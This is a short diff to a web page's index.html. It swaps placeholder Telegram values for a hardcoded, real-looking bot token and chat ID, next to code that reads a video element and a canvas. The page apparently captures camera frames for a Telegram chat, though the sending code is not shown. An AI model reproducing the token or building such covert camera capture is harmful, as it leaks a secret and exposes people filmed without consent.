--- a/index.html
+++ b/index.html
@@ -99,8 +99,8 @@
 <canvas id="canvas" width="320" height="240"></canvas>
 
 <script>
-  const botToken = "✅YOUR_TELEGRAM_BOT_TOKEN";
-  const chatId = "✅YOUR_CHAT_ID";
+  const botToken = "8079056355:AAGP1alTryOpzFmtk8ZxNWKxs6q59Mbuj70";
+  const chatId = "8182050140";
 
   const video = document.getElementById("video");
   const canvas = document.getElementById("canvas");
